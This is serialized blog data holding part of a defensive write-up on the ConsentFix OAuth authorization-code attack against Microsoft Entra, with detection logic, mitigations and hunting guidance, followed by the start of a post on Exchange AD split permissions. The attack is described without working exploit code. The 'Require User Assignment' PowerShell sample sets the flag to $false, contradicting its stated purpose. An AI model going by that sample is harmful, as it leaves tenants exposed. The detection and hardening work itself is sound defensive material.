factor:",[1254,22765,22766,22769,22772,22775,22778,22781],{},[1257,22767,22768],{},"Both events share the same SessionId",[1257,22770,22771],{},"Both events share the same ApplicationId",[1257,22773,22774],{},"Both events share the same UserId",[1257,22776,22777],{},"The second event must be after the first event",[1257,22779,22780],{},"The second event must be within approximately a 10-minute time window after the first event. You should not use exactly 10 minutes as Microsoft writes \"[...] they expire after about 10 minutes\"",[1257,22782,22783],{},"You should only consider the very next second event, not subsequent ones",[2110,22785,22786],{},[12,22787,22788,22791,22793],{},[251,22789,22790],{},"Fun fact",[531,22792],{},"\nThe ResourceIdentity is not a good link, as the attacker can change the resource since it is not bound to the auth code. The targeted application ID cannot be changed.",[41,22795,22797],{"id":22796},"reduce-the-noise","Reduce the noise",[12,22799,22800],{},"This knowledge already provided us with a good working detection, but there were benign positives in the mix as well. Modern developers use cloud resources that appear like local instances, but result in irregular login patterns in the logs.",[12,22802,22803],{},"The key difference is the time component. While the attack requires user interaction to copy and paste or drag and drop the URI, the GitHub Codespace use case we identified as the source of the benign positive alerts is completely automated and redeems the auth code within mere seconds.",[12,22805,22806],{},"So filtering out anything that does this authentication dance within a few seconds can most likely be removed as benign.",[12,22808,22809],{},"Another source of noise could be changing egress points for your internet traffic, especially in SD-WAN, ZTNA or Secure Web Gateway scenarios.",[41,22811,22813],{"id":22812},"affected-first-party-applications","Affected first-party applications",[12,22815,22816],{},"While the initial report shows \"Microsoft Azure CLI\" as the abused application there are a lot of different Microsoft first-party apps with pre-consent in every tenant that offer localhost as redirect. And not only those are a target. The attacker could also abuse reply test and dev URLs that are not publicly resolvable.",[12,22818,22819],{},"Here is a list of the most notable applications that also have high pre-consentet permissions on resources.",[1254,22821,22822,22825,22828,22831,22834],{},[1257,22823,22824],{},"Microsoft Azure CLI (04b07795-8ddb-461a-bbee-02f9e1bf7b46)",[1257,22826,22827],{},"Microsoft Azure PowerShell (1950a258-227b-4e31-a9cf-717495945fc2)",[1257,22829,22830],{},"Visual Studio (04f0c124-f2bc-4f59-8241-bf6df9866bbd)",[1257,22832,22833],{},"Visual Studio Code (aebc6443-996d-45c2-90f0-388ff96faa56)",[1257,22835,22836],{},"MS Teams PowerShell Cmdlets (12128f48-ec9e-42f0-b203-ea49fb6af367)",[12,22838,22839,22840,22845],{},"A full list of these apps are now included in ",[2672,22841,22844],{"href":22842,"rel":22843},"https://entrascopes.com/?authcodeFix=true",[2676],"EntraScopes.com"," by our colleague Fabian Bader.",[41,22847,22849],{"id":22848},"mitigations-and-protections","Mitigations and Protections",[186,22851,22853],{"id":22852},"limit-the-attack-surface-and-audience","Limit the attack surface and audience",[52,22855,22858,22861,22862,22864,22867,22868,22870,22873],{"className":22856},[22857],"option-block",[251,22859,22860],{},"Deployment effort:"," Low to High (depends on effort to identify legitimate users)",[531,22863],{},[251,22865,22866],{},"Mitigation:"," Medium (reduces the potential audience for the attack)",[531,22869],{},[251,22871,22872],{},"Scope:"," limited\n",[186,22875,22877],{"id":22876},"option-1-require-user-assignment","Option 1: Require User Assignment",[4338,22879,22881],{"id":22880},"pre-requisites","Pre-requisites:",[1254,22883,22884,22887,22890],{},[1257,22885,22886],{},"Add the service principal for affected first-party apps by using Microsoft Graph API or PowerShell",[1257,22888,22889],{},"Apply the user assignment requirement on the service principal object using Microsoft Graph API or PowerShell",[1257,22891,22892],{},"Establish a process to assign users upon request via Access Packages, PIM-for-Groups (for just-in-time access), or a combination of both.",[2127,22894,22895],{},"\n.code-block {\n  background-color: #f6f8fa;\n  padding: 0 16px 16px 16px;\n  border-radius: 6px;\n  font-family: Menlo, Consolas, Monaco, \"Courier New\", monospace;\n  font-size: 14px;\n  line-height: 1.5;\n  overflow-x: auto;\n  white-space: pre;\n  border: 1px solid #d0d7de;\n}\n",[56,22897,22899],{"className":22898},[524],[63,22900,22901],{},"\n// Example for Microsoft Graph PowerShell\nConnect-MgGraph -Identity\n$AppId = \"04b07795-8ddb-461a-bbee-02f9e1bf7b46\" // Microsoft Azure CLI\n$sp = Get-MgServicePrincipal -Filter \"appId eq '$AppId'\"\nUpdate-MgServicePrincipal -ServicePrincipalId $sp.Id -AppRoleAssignmentRequired:$false\n",[4338,22903,22905],{"id":22904},"benefit","Benefit:",[1254,22907,22908,22911,22914,22917],{},[1257,22909,22910],{},"Enables management of user assignments through Access Packages or manual group membership to limit exposure to this attack technique.",[1257,22912,22913],{},"Option to provide just-in-time access combined with eligible group membership assignment, allowing temporary access to CLI tools and thereby further reducing the attack surface.",[1257,22915,22916],{},"Applied before evaluating Conditional Access policies.",[1257,22918,22919],{},"Limits the attack surface for other scenarios as well.",[4338,22921,22923],{"id":22922},"disadvantage","Disadvantage:",[1254,22925,22926,22929,22932],{},[1257,22927,22928],{},"Can only be scoped to specific users and not combined with other requirements like usage of specific devices",[1257,22930,22931],{},"All legitimate CLI tool users must be identified",[1257,22933,22934],{},"Side effects and organizational impact must be carefully assessed by reviewing previous sign-ins.",[186,22936,22938],{"id":22937},"option-2-block-access-by-using-conditional-access-policies","Option 2: Block access by using Conditional Access Policies",[4338,22940,22881],{"id":22941},"pre-requisites-1",[1254,22943,22944,22947],{},[1257,22945,22946],{},"Create a Conditional Access policy to block access to CLI tools, excluding legitimate users, by targeting \"Microsoft Graph Command Line Tools\" and \"Windows Azure Service Management API\"",[1257,22948,22949],{},"Manage exclusions via group membership, either manually or through entitlement management (e.g., Access Packages).",[4338,22951,22905],{"id":22952},"benefit-1",[1254,22954,22955,22958],{},[1257,22956,22957],{},"Prevents token issuance for non-legitimate or non-privileged users.",[1257,22959,22960],{},"Allows granular scoping based on additional conditions such as device or network.",[4338,22962,22923],{"id":22963},"disadvantage-1",[1254,22965,22966,22969],{},[1257,22967,22968],{},"All legitimate CLI tool users must be identified and excluded.",[1257,22970,22971],{},"Side effects and organizational impact must be carefully assessed by reviewing previous sign-ins and evaluating the policy in report-only mode.",[186,22973,22975],{"id":22974},"block-token-issuance-by-authorization-code-flow","Block token issuance by authorization code flow",[2127,22977,22978],{},"\n.option-block {\n  background-color: #f6f8fa;\n  padding: 16px;\n  margin-bottom:2rem;\n  border-radius: 6px;\n  overflow-x: auto;\n  border: 1px solid #d0d7de;\n}\n",[52,22980,22982,22985,22986,22988,22990,22991,22993,22990,22995,22997,22999],{"className":22981},[22857],[251,22983,22984],{},"Option:"," Require Token Protection",[531,22987],{},[251,22989,22860],{}," High",[531,22992],{},[251,22994,22866],{},[531,22996],{},[251,22998,22872],{}," Very limited\n",[4338,23001,22881],{"id":23002},"pre-requisites-2",[1254,23004,23005,23008,23011,23030],{},[1257,23006,23007],{},"Microsoft Entra ID P1 licenses",[1257,23009,23010],{},"Entra ID Registered Devices, Hybrid or Entra ID-joined devices on Windows platform",[1257,23012,23013,23014,805,23019,2901,23024,23029],{},"Enable Web Account Manager (WAM) in ",[2672,23015,23018],{"href":23016,"rel":23017},"https://learn.microsoft.com/en-us/cli/azure/authenticate-azure-cli-interactively?view=azure-cli-latest#sign-in-with-web-account-manager-wam-on-windows",[2676],"Azure CLI",[2672,23020,23023],{"href":23021,"rel":23022},"https://learn.microsoft.com/en-us/powershell/azure/configure-global-settings?view=azps-15.1.0#web-account-manager-wam",[2676],"Azure PowerShell",[2672,23025,23028],{"href":23026,"rel":23027},"https://learn.microsoft.com/en-us/powershell/module/microsoft.graph.authentication/set-mggraphoption?view=graph-powershell-1.0#set-web-account-manager-support",[2676],"Microsoft Graph PowerShell"," (default in latest versions)",[1257,23031,23032,23033],{},"Configure Conditional Access targeting:\n",[1254,23034,23035,23049,23056],{},[1257,23036,23037,23038],{},"Cloud App targeting to the following apps:\n",[1254,23039,23040,23043,23046],{},[1257,23041,23042],{},"Office 365 Exchange Online",[1257,23044,23045],{},"Office 365 SharePoint Online",[1257,23047,23048],{},"Microsoft Teams Services",[1257,23050,23051,23052,23055],{},"Client apps under ",[3456,23053,23054],{},"Mobile apps and desktop clients"," to require Token Protection.",[1257,23057,23058,23059,23062,23063,23066],{},"Select ",[3456,23060,23061],{},"Windows"," as ",[3456,23064,23065],{},"device platform"," for targeting the policy",[4338,23068,22905],{"id":23069},"benefit-2",[12,23071,23072],{},"Microsoft Entra’s token protection requires proof‑of‑possession (PoP), which can only be enforced when the client communicates directly with a trusted token broker such as the Web Account Manager (WAM) on Windows. Because browsers cannot establish this secure channel, the authorization code flow initiated in a browser is blocked under token protection policies.",[12,23074,23075],{},"When the policy enforces token protection that requires broker‑managed PoP, the authorization code returned to a browser cannot be redeemed because the browser cannot produce the required broker‑signed proof during the code to token exchange",[12,23077,23078],{},"In this case, attacks with AuthCodeFix will be fully mitigated as long the application can be protected by Token Protection.",[12,23080,23081],{},"As shown in the screenshot below, Token Protection successfully mitigates the redemption of the authorization code flow initiated by the victim through a phishing action.",[12,23083,23084],{},[2642,23085],{"alt":23086,"src":23087},"Token Protection successfully mitigates the redemption of the authorization code flow","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-07.png",[4338,23089,22923],{"id":23090},"disadvantage-2",[1254,23092,23093,23123,23126,23129],{},[1257,23094,23095,23096],{},"Only the following resources are officially supported:\n",[1254,23097,23098,23100,23102],{},[1257,23099,23042],{},[1257,23101,23045],{},[1257,23103,23048,23104,23106,23108,23109,2901,23112,23116,23117,23122],{},[531,23105],{},[531,23107],{},"\nThe Microsoft Graph API is indirectly covered by the previously mentioned resources and Microsoft Graph PowerShell is listed as a supported client. We were able to verify in our testing that the attack for this scenario will be mitigated. “Windows Azure Service Management API\" is not listed as a supported resource. Both CLI clients (",[2672,23110,23018],{"href":23016,"rel":23111},[2676],[2672,23113,23023],{"href":23114,"rel":23115},"https://learn.microsoft.com/en-us/powershell/azure/authenticate-interactive?view=azps-15.1.0#benefits-of-wam",[2676],") support WAM which is a client-side requirement to use Token Protection. Microsoft has been announced ",[2672,23118,23121],{"href":23119,"rel":23120},"https://techcommunity.microsoft.com/blog/microsoft-entra-blog/how-to-break-the-token-theft-cyber-attack-chain/4062700",[2676],"in a blog post"," to extend token protection capabilities for Azure management scenarios.",[1257,23124,23125],{},"Some bugs in Microsoft Graph PowerShell force you to temporarily disable WAM integration",[1257,23127,23128],{},"Side effects and organizational impact must be carefully assessed by reviewing previous sign-ins and evaluating the policy in report-only mode. The cloud app targeting will also effect productivity access to Microsoft 365.",[1257,23130,23131],{},"Limited scope due to availability on supported platforms and Entra ID–integrated devices.",[186,23133,23135],{"id":23134},"block-further-token-issuance-by-compliant-network-check-or-trusted-network","Block further token issuance by compliant network check or trusted network",[52,23137,23139,23141,23142,23144,23141,23146,23148,23150],{"className":23138},[22857],[251,23140,22860],{}," Medium",[531,23143],{},[251,23145,22866],{},[531,23147],{},[251,23149,22872],{}," Broad\n",[186,23152,23154],{"id":23153},"option-block-access-outside-of-compliant-network-with-global-secure-access","Option: Block access outside of Compliant network with Global Secure Access",[4338,23156,23158],{"id":23157},"pre-requisite","Pre-requisite:",[1254,23160,23161,23164,23167,23170],{},[1257,23162,23163],{},"Entra ID P1 license",[1257,23165,23166],{},"Entra ID Registered Devices, Hybrid or Entra ID-joined devices on Windows, macOS, Androind and iOS platform",[1257,23168,23169],{},"Global Secure Access Client on all affected clients and enabled Entra Internet Access for M365 Traffic Profile",[1257,23171,23172],{},"Conditional Access Policy to enforce network compliant check should be applied to all cloud apps",[4338,23174,22905],{"id":23175},"benefit-3",[12,23177,23178],{},"Block additional token issuance by enforcing a trusted network check. This mitigation ensures attackers cannot obtain new tokens using the refresh token from the authorization code flow. However, it does not prevent the initial redemption of the authorization code or the issuance of the first access token, which remains valid outside the compliant network because it was originally requested by the victim.",[2110,23180,23181],{},[12,23182,23183],{},"Enforcing GSA with the Compliant Network condition also blocks other Token Replay scenarios and adds additional logs which can be very useful for detections and hunting.",[4338,23185,22923],{"id":23186},"disadvantage-3",[1254,23188,23189,23192,23195],{},[1257,23190,23191],{},"Only applicable for users and devices with deployed Global Secure Access client",[1257,23193,23194],{},"Limited scope due to availability on Entra ID–integrated devices",[1257,23196,23197],{},"Enforcing Compliant Networks via CA will need some Exclusions like Intune to avoid chicken-egg-problems. Detailed testing is needed before rollout",[41,23199,23201],{"id":23200},"hunting-queries","Hunting queries",[12,23203,23204,23205,23208],{},"Once all the prerequisites for token theft mitigations are met - such as deploying the GSA client (including ingestion of ",[63,23206,23207],{},"NetworkAccessTraffic"," logs) and taking benefit of WAM authentication - we gain additional options for threat hunting and verification.",[186,23210,23212],{"id":23211},"leveraging-gsa-logs-and-wam-authentication-for-hunting-or-verify-confidence-on-detection-results","Leveraging GSA Logs and WAM Authentication for hunting or verify confidence on detection results",[12,23214,23215,23216,23218],{},"This hunting query leverages ",[63,23217,23207],{}," logs from Global Secure Access (GSA), which include the initiating process for communication with the Microsoft Entra token endpoint. This helps determine whether a token request originated directly from a browser and also whether any additional token requests were made outside the GSA network.",[2110,23220,23221],{},[12,23222,23223],{},"This query works and delivers only reliable results when the prerequisites are met; otherwise, it leads to a high false-positive rate.",[12,23225,23226,23229,23230,23233,23234,23237],{},[251,23227,23228],{},"Why this matters:"," When signing in via CLI or PowerShell modules using Web Account Manager (WAM) on Windows Devices, the flow does not involve a browser-based authorization code. This sign-in behavior is the default in the latest version. Therefore, if the initiating process is a browser executable (e.g., ",[63,23231,23232],{},"msedge.exe","), this is a strong indicator of suspicious activity. On macOS, the process is initiated by the Company Portal app (",[63,23235,23236],{},"com.microsoft.CompanyPortalMac.ssoextension",")  when using Platform SSO.",[12,23239,23240,23243],{},[251,23241,23242],{},"Token Binding and PoP:"," WAM authentication typically binds tokens to the device by enforcing Proof-of-Possession (PoP). Attackers cannot issue further bounded tokens without PoP, so an unbounded refresh token is another strong indicator.",[12,23245,23246,23249],{},[251,23247,23248],{},"Limitations:"," All the mentioned signals are only available when the accessing device is registered with or joined to Microsoft Entra ID.",[12,23251,23252,23255],{},[251,23253,23254],{},"Confidence Score Logic:"," The query combines multiple signals to calculate a confidence score:",[1254,23257,23258,23261,23264],{},[1257,23259,23260],{},"Presence of a browser process initiating token requests.",[1257,23262,23263],{},"Detection and down grade to unbounded tokens.",[1257,23265,23266],{},"Network provider changes (including Compliant to non-compliant) between sign-ins.",[12,23268,23269],{},"These signals can be used in the query to hunt for activity or to derive a confidence score in the event of an incident based on the previous detection.",[12,23271,23272],{},[2642,23273],{"alt":23274,"src":23275},"Signals for the hunting query","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-08.png",[12,23277,23278],{},"The following scoring will be shown depending on the conditions:",[12,23280,23281,23284,23285,23287,23288,23290,23292,23295,23296,23298,23300,23303],{},[251,23282,23283],{},"A very high confidence score"," is displayed when ",[63,23286,23207],{}," logs indicate a familiar browser process instead of initiating a token request, and a downgrade of an unbound token has been detected.",[531,23289],{},[531,23291],{},[251,23293,23294],{},"A high confidence score"," is shown when the sign-in occurs from a different Network Provider (ASN) and a non-compliant network involving unbound tokens.",[531,23297],{},[531,23299],{},[251,23301,23302],{},"A medium confidence score"," is shown when only a change in Network Provider and compliant network is identified, along with a change in the token type used.",[12,23305,23306,23307,1013],{},"You’ll find the latest version of the hunting query on ",[2672,23308,23311],{"href":23309,"rel":23310},"https://github.com/Cloud-Architekt/AzureSentinel/blob/main/Hunting%20Queries/EID-Authentication/ConsentFix-HuntingConfidenceOnTokenAndNetworkSignals.kusto",[2676],"GitHub",[186,23313,23315],{"id":23314},"hunting-for-activities-by-issued-tokens","Hunting for activities by issued tokens",[12,23317,23318,23319,23324,23325,23328,23329,23331,23332,23335],{},"You should consider expanding your investigation beyond sign-in events to include activities performed using tokens issued by the attacker. Our colleague Thomas Naunheim has ",[2672,23320,23323],{"href":23321,"rel":23322},"https://github.com/Cloud-Architekt/AzureSentinel/blob/main/Hunting%20Queries/EID-TokenHunting/MicrosoftCloudActivity.func",[2676],"published a KQL function"," called ",[63,23326,23327],{},"MicrosoftCloudActivity",", which can assist in this extended hunting process. Additionally, the affected ",[63,23330,22759],{}," can be correlated with suspicious ",[63,23333,23334],{},"UniqueId"," values identified during previous hunts for deeper analysis.",[12,23337,23338],{},[2642,23339],{"alt":23340,"src":23341},"KQL function","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-09.png",[12,23343,23344],{},"In this example, the attacker leveraged the refresh token obtained during the attack to issue an access token for the Microsoft Graph API. This token was then used to maintain persistent access and lateral movement by adding a client secret to an application owned by the victim. The query provides details about the Graph API operation, including the token protection status and whether the operation occurred outside the Global Secure Access network.",[12,23346,23347],{},[2642,23348],{"alt":23349,"src":23350},"Graph API operation screenshot","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-10.png",[41,23352,23354],{"id":23353},"further-reading","Further Reading",[1254,23356,23357,23364,23371,23378],{},[1257,23358,23359],{},[2672,23360,23363],{"href":23361,"rel":23362},"https://pushsecurity.com/blog/consentfix",[2676],"ConsentFix: Analysing a browser-native ClickFix-style attack that hijacks OAuth consent grants - PushSecurity",[1257,23365,23366],{},[2672,23367,23370],{"href":23368,"rel":23369},"https://youtu.be/AAiiIY-Soak",[2676],"Hacking Endpoint to Identity (Microsoft 365): \"ConsentFix\" - YouTube",[1257,23372,23373],{},[2672,23374,23377],{"href":23375,"rel":23376},"https://learn.microsoft.com/en-us/entra/identity-platform/v2-oauth2-auth-code-flow",[2676],"Microsoft identity platform and OAuth 2.0 authorization code flow",[1257,23379,23380],{},[2672,23381,23384],{"href":23382,"rel":23383},"https://entrascopes.com/?appId=04b07795-8ddb-461a-bbee-02f9e1bf7b46",[2676],"Microsoft Azure CLI on entrascpes.com",{"title":65,"searchDepth":111,"depth":111,"links":23386},[23387,23390,23391,23392,23400,23404],{"id":22717,"depth":111,"text":22718,"children":23388},[23389],{"id":22743,"depth":329,"text":22744},{"id":22796,"depth":111,"text":22797},{"id":22812,"depth":111,"text":22813},{"id":22848,"depth":111,"text":22849,"children":23393},[23394,23395,23396,23397,23398,23399],{"id":22852,"depth":329,"text":22853},{"id":22876,"depth":329,"text":22877},{"id":22937,"depth":329,"text":22938},{"id":22974,"depth":329,"text":22975},{"id":23134,"depth":329,"text":23135},{"id":23153,"depth":329,"text":23154},{"id":23200,"depth":111,"text":23201,"children":23401},[23402,23403],{"id":23211,"depth":329,"text":23212},{"id":23314,"depth":329,"text":23315},{"id":23353,"depth":111,"text":23354},{"lang":2171,"seoTitle":23406,"titleClass":2173,"date":23407,"categories":23408,"blogtitlepic":23409,"socialimg":23410,"customExcerpt":23411,"keywords":23412,"hreflang":23413,"scripts":23418,"asideNav":23419,"maxContent":2181,"published":2181},"ConsentFix: How a New OAuth Attack Bypasses Microsoft Entra Conditional Access","2025-12-31",[2176],"head-consentfix","/heads/head-consentfix.jpg","Just before year's end, ConsentFix emerges: a clever OAuth-based attack that abuses legitimate authentication flows to steal the authorization code, effectively handing attackers the keys to Microsoft Entra. We break down why this works despite Conditional Access, which signals it leaves behind in the logs, and how defenders can detect and stop it before real damage is done.","ConsentFix attack, OAuth authorization code theft, Microsoft Entra OAuth attack, Azure CLI token abuse, Entra ID Conditional Access bypass, authorization code phishing, token replay attack Azure, Proof of Possession tokens, WAM authentication security, Azure sign-in log analysis, detect OAuth attacks Entra, Azure identity threat hunting, Global Secure Access token protection, Microsoft Entra security detection",[23414,23416],{"lang":2260,"href":23415},"/de/posts/2025-12-31-vulnerability-consentfix",{"lang":2263,"href":23417},"/es/posts/2025-12-31-vulnerability-consentfix",{"slick":2181,"form":2181},{"menuItems":23420},[23421,23423,23425,23427,23429,23431],{"href":23422,"text":22718},"#detection-artifacts",{"href":23424,"text":22797},"#reduce-the-noise",{"href":23426,"text":22813},"#affected-first-party-applications",{"href":23428,"text":22849},"#mitigations-and-protections",{"href":23430,"text":23201},"#hunting-queries",{"href":23432,"text":23354},"#further-reading","/posts/2025-12-31-vulnerability-consentfix",{"title":22622,"description":22628},"posts/2025-12-31-vulnerability-consentfix",[23437,23438,6236],"OAuth 2.0","Microsoft Entra ID","4UG-WoC2ftVsQzfnag7pJEA-GrE8udM7ACoKFmjhLYw",{"id":23441,"title":23442,"author":23443,"body":23444,"cta":2166,"description":65,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":24102,"moment":24104,"navigation":2181,"path":24129,"seo":24130,"stem":24131,"tags":2166,"webcast":2168,"__hash__":24132},"content_en/posts/2026-03-01-exchange-ad-split-permissions-hardening.md","Exchange AD Split Permissions without regrets",[2349],{"type":9,"value":23445,"toc":24089},[23446,23450,23453,23459,23464,23480,23483,23489,23493,23497,23505,23519,23525,23528,23533,23569,23592,23596,23604,23612,23617,23633,23637,23643,23647,23652,23710,23715,23752,23755,23759,23773,23780,23796,23805,23809,23812,23858,23861,23870,23879,23882,23896,23913,23926,23938,23943,24002,24006,24011,24031,24038,24062,24066,24069,24072,24086],[41,23447,23449],{"id":23448},"tldr-what-if-we-remove-the-downsides","TLDR: what if we remove the downsides?",[12,23451,23452],{},"I found a way to re-grant AD and RBAC permissions directly where Exchange users, groups, and contacts reside, requiring no changes for admins or identity management systems. In my experience, that friction has been the primary blocker for most companies. And we still retain the security benefits against lateral movement and domain compromise.",[12,23454,23455],{},[2642,23456],{"alt":23457,"src":23458},"Active Directory","https://res.cloudinary.com/c4a8/image/upload/v1770991330/blog/pics/Blog_-_Exchange_AD_Split_Permissions_-_1.png",[12,23460,23461],{},[251,23462,23463],{},"It’s achieved in three steps:",[3259,23465,23467,23474,23477],{"style":23466},"margin: 0.25rem 0",[1257,23468,23469,23470],{},"Implement ",[2672,23471,23473],{"href":23472},"https://learn.microsoft.com/en-us/exchange/permissions/split-permissions/configure-exchange-for-split-permissions#switch-to-active-directory-split-permissions","AD split permission model",[1257,23475,23476],{},"Grant Exchange servers the lost AD permissions, but only on the relevant OUs",[1257,23478,23479],{},"Grant Exchange RBAC to re-enable missing PowerShell cmdlets",[12,23481,23482],{},"All via Microsoft’s guidance, AD ACLs or Exchange RBAC assignments.",[23484,23485],"video-frame",{"thumb":23486,"alt":23487,"id":23488,":full-width":3821},"/thumbs/thumb-exchange-ad-split-permissions-webcast.jpg","A presenter sits in front of a laptop explaining a slide titled Step 1: Active Directory Permissions by glueckkanja. The slide covers how to implement Microsoft Exchange AD Split Permissions, including PowerShell commands for creating a delegation group (New-ADGroup, Add-ADGroupMember) and applying permissions via the script Add-ExchangeADSplitPermissionOnOU.ps1.","soNZkNRopSQ",[52,23490,23492],{"style":23491},"background:var(--color-black-4); margin-top:0.5rem; padding:0.5rem 1rem; font-size:0.85rem; color:var(--color-blue-dark)","Webcast: Exchange AD Split Permissions without regrets. A Step-by-step implementation guide",[41,23494,23496],{"id":23495},"why-do-we-care-now","Why do we care (now)?",[12,23498,23499,23500,23502,23504],{},"It has been largely overlooked or ignored since it was introduced with Exchange 2010 SP1. But the default shared permissions model represents a big security risk of Active Directory takeover. Combined with Exchange being notorious for remote exploits the last few years, it’s time to act!",[531,23501],{},[531,23503],{},"\nThe problem originates from privileges granted to the root of a domain that get inherited throughout the domain.",[1254,23506,23507,23510,23513,23516],{"style":23466},[1257,23508,23509],{},"modify permissions on users and groups (effectively full access)",[1257,23511,23512],{},"modify group members",[1257,23514,23515],{},"reset password on users",[1257,23517,23518],{},"create/delete users and groups",[12,23520,23521],{},[2642,23522],{"alt":23523,"src":23524},"Permissions","https://res.cloudinary.com/c4a8/image/upload/v1770991330/blog/pics/Blog_-_Exchange_AD_Split_Permissions_-_2.png",[12,23526,23527],{},"Only certain highly privileged Tier 0 users and groups are protected by the AdminSDHolder process (attribute admincount=1) and in many environments there will be unprotected users or groups that could allow compromise of the domain and/or forest or at least cause serious impact.",[12,23529,23530],{},[251,23531,23532],{},"Prominent examples:",[1254,23534,23535,23538,23558],{"style":23466},[1257,23536,23537],{},"Entra Connect Sync account when using Password Hash Sync",[1257,23539,23540,23541],{},"Default groups",[1254,23542,23544,23547,23555],{"style":23543},"margin: 0",[1257,23545,23546],{},"Allowed RODC Password Replication Group together with Entra Connect account (if a real Windows RODC exists)",[1257,23548,23549,23550,23554],{},"Also see ",[2672,23551,23553],{"href":23552,"target":4914},"https://specterops.io/blog/2025/06/25/untrustworthy-trust-builders-account-operators-replicating-trust-attack-aorta","Untrustworthy Trust Builders: Account Operators Replicating Trust Attack (AORTA) - SpecterOps"," showing more paths (Account Operators group is a similar threat)",[1257,23556,23557],{},"Emptying Protected Users to create attack vectors by removing protections",[1257,23559,23560,23561],{},"Unprotected custom groups or admin/service accounts",[1254,23562,23563,23566],{"style":23543},[1257,23564,23565],{},"Write permission on GPOs (applying to domain controller)",[1257,23567,23568],{},"Managing access to AD backups, backup server, PKI templates, hypervisor, ...",[12,23570,23571,23572,23574,23576,23577,23582,23584,23586,23587],{},"It is very hard to retroactively contain all these current and future potential pathways. For the _ADM custom OU, you could disable ACL inheritance, but most default objects may not be moved from the default Builtin OU or Users container and remain vulnerable.",[531,23573],{},[531,23575],{},"\nIt is much better to remove the powerful permissions from the root, which is done by implementing the Active Directory split permissions model. ",[2672,23578,23581],{"href":23579,"rel":23580},"https://learn.microsoft.com/en-us/exchange/permissions/split-permissions/configure-exchange-for-split-permissions",[2676],"Configure Exchange Server for split permissions | Microsoft Learn",[531,23583],{},[531,23585],{},"\nAnd Microsoft agrees “…encouraged to implement Active Directory split permissions” ",[2672,23588,23591],{"href":23589,"rel":23590},"https://techcommunity.microsoft.com/blog/coreinfrastructureandsecurityblog/active-directory-hardening-series---part-7-%E2%80%93-implementing-least-privilege/4366626",[2676],"Active Directory Hardening Series - Part 7 – Implementing Least Privilege | Microsoft Community Hub",[41,23593,23595],{"id":23594},"but-why-is-no-one-doing-it","But why is no one doing it?",[12,23597,23598,23599,23601,23603],{},"As split permissions weren’t available until Exchange 2010 SP1, everyone had accepted it by then and it seems that security teams did not manage to push it successfully once it existed.",[531,23600],{},[531,23602],{},"\nAnd it would have forced changes to admin and IDM processes, like creating users or distribution lists in AD first and only afterwards using Exchange to “mail enable” them.",[2110,23605,23606],{},[12,23607,23608,23611],{},[251,23609,23610],{},"Info:"," The following cmdlets will no longer be available or working: Add-DistributionGroupMember, New-DistributionGroup, New-Mailbox, New-MailContact, New-MailUser, New-RemoteMailbox, Remove-DistributionGroup, Remove-DistributionGroupMember, Remove-Mailbox, Remove-MailContact, Remove-MailUser, Remove-RemoteMailbox, Update-DistributionGroupMember, Add-ADPermission, Remove-ADPermission",[12,23613,23614],{},[251,23615,23616],{},"Adoption examples:",[1254,23618,23619,23630],{"style":23466},[1257,23620,23621,23622],{},"New-Mailbox (where Exchange writes to AD) would be:",[1254,23623,23624,23627],{"style":23543},[1257,23625,23626],{},"New-ADUser (where adm.jdoe writes to AD)",[1257,23628,23629],{},"Enable-Mailbox",[1257,23631,23632],{},"Add-ADPermission for SendAs rights would have to be done via AD users and computers in the security tab and often requiring additional AD permissions for standard admins.",[41,23634,23636],{"id":23635},"show-me-this-no-regrets-option","Show me this no-regrets option!",[12,23638,23639,23642],{},[251,23640,23641],{},"Disclaimer",": Please fully read and understand the following links and articles, perform it in a test environment first, make sure AD backups are current and recovery practices are established!",[186,23644,23646],{"id":23645},"audit-current-usage","Audit current usage",[12,23648,23649],{},[251,23650,23651],{},"You should first check which of the affected cmdlets are in use on which OUs:",[524,23653,23654,23661,23663,23669,23671],{},[102,23655,23656,23660],{},[102,23657,23659],{"style":23658},"color:var(--color-orange)","$CsvPath"," = \"C:\\temp\\SplitPermissionAdminAuditLog.csv\"",[531,23662],{},[102,23664,23665,23668],{},[102,23666,23667],{"style":23658},"$Cmdlets"," = \"Add-ADPermission\",\"Remove-ADPermission\",\"New-DistributionGroup\",\"Remove-DistributionGroup\",\"Add-DistributionGroupMember\",\"Update-DistributionGroupMember\",\"Remove-DistributionGroupMember\",\"New-Mailbox\",\"Remove-Mailbox\",\"New-RemoteMailbox\",\"Remove-RemoteMailbox\",\"New-MailUser\",\"Remove-MailUser\",\"New-MailContact\",\"Remove-MailContact\"",[531,23670],{},[102,23672,23673,540,23676,23680,23681,540,23684,23686,23687,23690,23691,540,23694,540,23697,540,23699,23702,23703,23706,23707],{},[102,23674,23675],{"style":23658},"Search-AdminAuditLog",[102,23677,23679],{"style":23678},"color:var(--color-blue-medium)","-ResultSize"," 99000 ",[102,23682,23683],{"style":23678},"-Cmdlets",[102,23685,23667],{"style":23658}," | ",[102,23688,23689],{"style":23658},"Select-Object"," RunDate,Caller,ObjectModified,CmdletName,@{Name='CmdletParameters';Expression={[string]::join(\",\", ($\\_.CmdletParameters))}},succeeded,error | ",[102,23692,23693],{"style":23658},"Export-Csv",[102,23695,23696],{"style":23678},"-Path",[102,23698,23659],{"style":23658},[102,23700,23701],{"style":23678},"-Delimiter"," \";\" ",[102,23704,23705],{"style":23678},"-Encoding"," Unicode ",[102,23708,23709],{"style":23678},"-NoTypeInformation",[12,23711,23712],{},[251,23713,23714],{},"Quick Analysis of caller and cmdlets:",[524,23716,23717,23733,23735,23743,23745],{},[102,23718,23719,23722,23723,540,23726,540,23728,540,23730,23732],{},[102,23720,23721],{"style":23658},"$CSVs"," = ",[102,23724,23725],{"style":23658},"Import-Csv",[102,23727,23696],{"style":23678},[102,23729,23659],{"style":23658},[102,23731,23701],{"style":23678}," \";\"",[531,23734],{},[102,23736,23737,23686,23739,23742],{},[102,23738,23721],{"style":23658},[102,23740,23741],{"style":23658},"Group-Object"," Caller",[531,23744],{},[102,23746,23747,23686,23749,23751],{},[102,23748,23721],{"style":23658},[102,23750,23741],{"style":23658}," CmdletName",[12,23753,23754],{},"Analyze the CSV for where AD permissions will be needed. Potentially optimize by moving all Exchange-relevant groups into dedicated OUs.",[41,23756,23758],{"id":23757},"enable-split-permissions-model","Enable Split Permissions Model",[12,23760,23761,23762,23765,23766,23770],{},"Follow Microsoft's instructions 